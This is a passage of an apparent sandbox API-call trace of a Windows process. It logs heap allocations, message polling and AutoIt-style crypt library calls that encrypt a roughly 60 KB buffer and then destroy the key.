PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.031] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.031] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.031] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.031] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.031] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.031] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.031] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.032] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.033] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xeb65, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xeb70) returned 1 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0030.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.034] CharLowerBuffW (in: lpsz="byte[60273]", cchLength=0xb | out: lpsz="byte[60273]") returned 0xb [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.034] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.035] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.035] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0030.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.036] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8dc210*, pdwDataLen=0x6ae220*=0xeb65, dwBufLen=0xeb70 | out: pbData=0x8dc210*, pdwDataLen=0x6ae220*=0xeb70) returned 1 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.036] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0030.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.037] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.037] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.037] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.037] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.037] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.037] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.037] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.038] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.042] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.042] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.042] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.042] CryptDestroyKey (hKey=0x7c2280) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.043] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.043] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.043] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.043] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.043] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.043] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.043] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.044] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.044] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.044] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: 